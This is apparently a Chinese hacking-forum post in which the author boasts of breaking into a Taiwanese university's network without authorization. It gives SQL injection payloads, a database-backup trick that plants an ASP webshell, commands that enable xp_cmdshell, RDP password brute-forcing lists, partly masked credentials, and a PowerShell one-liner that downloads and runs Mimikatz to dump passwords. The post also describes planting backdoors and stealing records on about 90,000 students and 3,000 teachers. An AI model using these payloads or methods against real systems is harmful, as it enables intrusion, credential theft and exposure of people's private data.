|
讲故事开始了: 查看是否有CDN:
管理员邮箱: ASP_NET[1.1.4322] Email[//csc@****.edu.tw,csc@****.edu.tw] HTTPServer[Microsoft-IIS/6.0] 站长工具端口扫描: www.****.edu.tw:80 开放 www.****.edu.tw:443 开放
在用nmap时,域名和IP的结果是不一样的, 上面是用域名扫出来的,而下面是IP扫出来的结果。 这是我在多次扫描的时候发现的. 可能已经有很多人已经知道了,我只是个无知的新手.
网站是aspx的随便点开链接.
获得路径: D:\****web\chinese\08_on******rvices\01_2_*****in.aspx
手工: and 1=1 And 1=2 Or 1=1 Or 1=2 And(4=4) And(4=5) 一些常用都无结果。 果断的,扔工具 sqlmap、Havij、pangolin、LiQiDiS都不行。 扫目录. 不过除了一后台没有什么可用的信息. http://www.****.edu.tw/admin/login.aspx 我想了很久还是拿出了17W字典扫下(因为有些站一扫就死了). 等了好久.还好我电脑里有AV,不然时间都不知道怎么过. 果然没让我失望,得到一个zip的解压包.107 MB, 下载回来看是网站源码. 第一时间当然找数据库密码。` server=10.0.0.10; uid=****web; password=****0307; database=web_**** 可惜是内网.我还是个菜鸟,也不懂net审计. 只能继续看了. 一些扫描:
没有什么高危漏洞 找子域名下手吧,. 那些失败的就不说出来了,直接说成功的吧. 太心酸了. 花了几天时间
Sqlmap一直超时,一些其它的工具我就不多说了.有些是报错的
不过我没有放弃, 注入语句: *.aspx?pid=1 aNd(6=6) *.aspx?pid=1 aNd(6=7) *.aspx?pid=1 oRder bY 1 --
又不行了, 然后一个一个来猜: .aspx?pid=1' unIon all selEct null -- 一直到...32 .aspx?pid=1' unIon all selEct null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null -- 列库都花了好几个小时, 还好是有工具帮忙. 繁琐的事当然交给工具,担不能依赖工具. 列出了一个库.不像别的直接可以列出来,是一个一个ascii码猜出来的.
' and (select len(db_name())) between 0 and 15 aNd 's' lIke 's .aspx?pid=1' and (select len(db_name())) between 0 and 7 aNd 's' lIke 's .aspx?pid=1' and (select ascii(substring(db_name(),1,1)))<=79 aNd 's' lIke 's ' and (select ascii(substring(db_name(),1,1)))%3C=115 aNd 's' lIke 's
至于猜表的时候,有47多个,得猜到什么时候.. 也没显示是不是DB权限,试下能汪能接备份拿shell了,连后台都省得进了. 之前得到了路径,百度了下语句构造了下:
.aspx?fid=16';alter%20database%20web_***%20set%20RECOVERY%20FULL%20- .aspx?fid=16';****%20table%20t_tmp(a%20image)%20-- .aspx?fid=16';backup%20log%20web_***%20to%20disk='d:%5Cweb_***%5Cenglish%5C02_users%5Cmx7krshell.asp'%20with%20init%20-- .aspx?fid=16';insert%20into%20t_tmp(a)%20values(0x203C256578656375746***72657175657374282273222929253E20)%20-- .aspx?fid=16';backup%20log%20web_***%20to%20disk='d:%5Cweb_***%5Cenglish%5C02_users%5Cmx7krshell.asp'%20-- .aspx?fid=16';drop%20table%20t_tmp%20-- 就这几条鸟语句,我TM执行的想屎呀,各种超时, 最后找了个台湾的VPN就还好的,最终还是成功了.
菜刀连:
难道有墙拦了? 还是备份不成功还是什么,当时就凌乱了.
找某牛,他给我的语句执行了也是连不上的. 一直以为是马的问题,换了几个变态的一句话都不行.. 原因有很多可能目录没有权限.所以就抱着试试的心态:语句: ';alter/**/database/**/[***]/**/set/**/recovery/**/full-- ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x64006***200610063006B00/**/backup/**/database/**/[***]/**/to/**/disk=@d/**/with/**/init-- ;****/**/table/**/[itpro]([a]/**/image)-- ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062***200610063006B00/**/backup/**/log/**/[***]/**/to/**/disk=@d/**/with/**/init-- ;insert/**/into/**/[itpro]([a])/**/values(0x3C2565786563***4652872657175657374282261222929253EDA)-- ;backup%20log%20***%20to%20disk='d:%5C***%5Cenglish%5Cmx7.asp'%20--
事后我看了我备份的马是没有成功的.
接下来提权了. 查看了一些基本的信息: 开了3389这好办了
咦,不是内网?怎么主站的数据库地址是10.0.0.10 难道这台跟主站不是一个子网的? 不可能呀,地址都是3个255. 先提权吧,348个补丁
先找数据库,如果是sa权限,直接提了 不过可惜呢 id='****top'; password='new****top' 先连3389看有木有别人留下来的后门
开了3389怎么连不上呢? 又不在在内网. 试了lcx一些内网反弹工具也不行. 这里思考了很久, 难道是因为台湾, 大陆连不上? 本人学生买不起VPN,也没网银,组织里面的哥哥都很好,以前都给过, 找了比较好的连接上。 我想的果然没错,奇迹的出现了. 也奇迹的发现了后门.
就直接添加了用户上去了,清理了后门,给自己留了一些后门还有一些马,, 以免在C段搞的时候被管理员发现了, 直接给修复了连哭的机会都没有. 以前的一些教训. 所以留了几保险点。 获取了管理员一些hash
然后拿着这些密码扫了下,没有一台是相同的. 我是在内网,连metasploit都用不了,真的是JJ痛。 先收集服务器信息吧, 这是一台虚拟机, 开了Cain也嗅探不了, 可能交换机策略..拿着x-scan对着C段乱扫. 最后,拿着主站得到的数据库,和获取到的hash一些密码各种组合.拿出国外3389爆破工具. ****.edu.tw ****0307 0307 ****web ****web0307 web_**** **123/*- **123 123/*- ****top0618 ****0321213*** ****0321213
成功的爆破了1台.,通过212用工具扫出C段一些主机的类型,大部分都是IBM和虚拟机、Hewlett Packard,这学校真土豪. 182这台是IBM Corp. 进去当然是留后门, 获取hash,了解这台服务器主要是干什么的,收集信息,有那些可利用的. 查看有那些端口是出现如下:
管理员把所有命令都删了? 查看了系统文件并没有的删的, 可能是没有设置环境变量.当把环境变量设置好后
看是流程图, 好像是什么系统的吧, 刚查看的端口有81、80、1433这些常用端口, 查看了网站
电子图书管理系统呀, 大陆很多名牌大学也用这系统 先进数据库找密码, 从数据库管理员登陆IP情况, 这学校不还有几个网段:
查找到管理员密码,可是31位md5加密? 不科学呀 不知道规律,所以用了最笨的方法。
都破解不出来,先用获取服务器的密码试下吧 数据库得到一些用户: ****.service@msa.****.net '**hare admin Host 各种密码试过后,再细想了下,
数据库名和这个不一样呀, 看到IP都不是, 怪我一时大意.看能否直接连到185那台去么
呵呵了,不过telnet 是可以外连的,难道做了策略只能允许连接一个? 还是当前版本不兼容 185是开了3389的,windows 2008 server操作系统, 这下蛋痛了, 再次组全密码扫. 对185进行扫描
也没有什么结果,我在212那台上有sqltools工具,怎么连都失败,然后telnet了下,才发现, 原来只允许182连接,哈哈, 这太激动了..
执行显示:
不错,管理安全还不错 解决之: sp_configure 'show advanced options',1 reconfigure go sp_configure 'xp_cmdshell',1 reconfigure Go
管理权限,拿下, 看见很多用户都获取不了hash,心有不甘呀.在此求大牛请考下windows 2008 server获取hash,不然肯定有更多机器在我手里 查看了185里面一些数据库文件外,先把182那个后台放着, 发现一个网站: 就是这逼站,让我浪费了不少时间在这扫描.哥哥终于搞定你了先留后门
当我留后门的时候,显示:
然后就妥妥的, 这台服务器就一个网站还有数据库,也没别的东西.. 还是找我们需要的东西吧 哈哈,这不是学生资料吗? 还好会点sql语句, 邮箱,电话、密码、学生,9W条,果断的下了
老师3000名资料到手. 还有家庭地址
找了一些没用的东西后,返回182, 查找了一些管理员目录一些文件,发现
发现是0.41段的, 刚好密码也是我组合的,直接又拿下一台08服务器,, 下载了一些获取hash的工具,
其实这个很好解决, 设定IE SEC设置一下就好了.
用了很多工具获出来都是空的, 最后看了网上说的神器:
但只能获取当前用户,对我来说没用, 找了很久也没找到就算了,收集下服务器信息:
一些网页,一些学校的照片,还有一些社团妹子的照片,不过学校真TM的土豪。 很失望没得到什么 唉,再次上神器扫描。这次各种组合密码。获得了2台服务器。
183 Hewlett Packard 187 IBM Corporation 两台真实机挺不错的 183这台也没找到什么,获取了一些密码外: ***.***.2.0/255.255.255.0, ***.***.37.0/255.255.255.0, ***.**.220.0/255.255.255.0 发现了几个网段. 187这台也就几个静态网页,获取密码外.也没得到太大的利用。 现在总结出来密码,已经有很多了
然后再次针对这个C段扫描, 得到190这台VMware, Inc. 我发现这个数据库的名是主站的:
可是我记得主站连接的IP是10.0.0.10 难道我下载的那网站源码有一段时间了?先查找这个数据库能否登陆主站 得到一些数据库,不过后台登录也太J8乱了
登陆个JJ呀, 发现加密:
而这加密别人跟我说是混肴加密. 很是让我头痛呀. 也就这样了吧, 黑页什么的没意思.. 最后管理员发现我了,知道我下载了数据库的一些东西, 如果上面打码有漏点,请不要发出来.. 这不是什么好事.. 只要给我足够的时间,另外几个C段也可以拿下的.我有这个信心.
本文涉及到的安全测试工具:AWVS,netspark,SQLMAP,中国菜刀,frdpb2,sqltools,mimikatz,hscan等。 附上一个获取win2008明文密码的一条命令。 powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2015-10-20 18:47:18
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡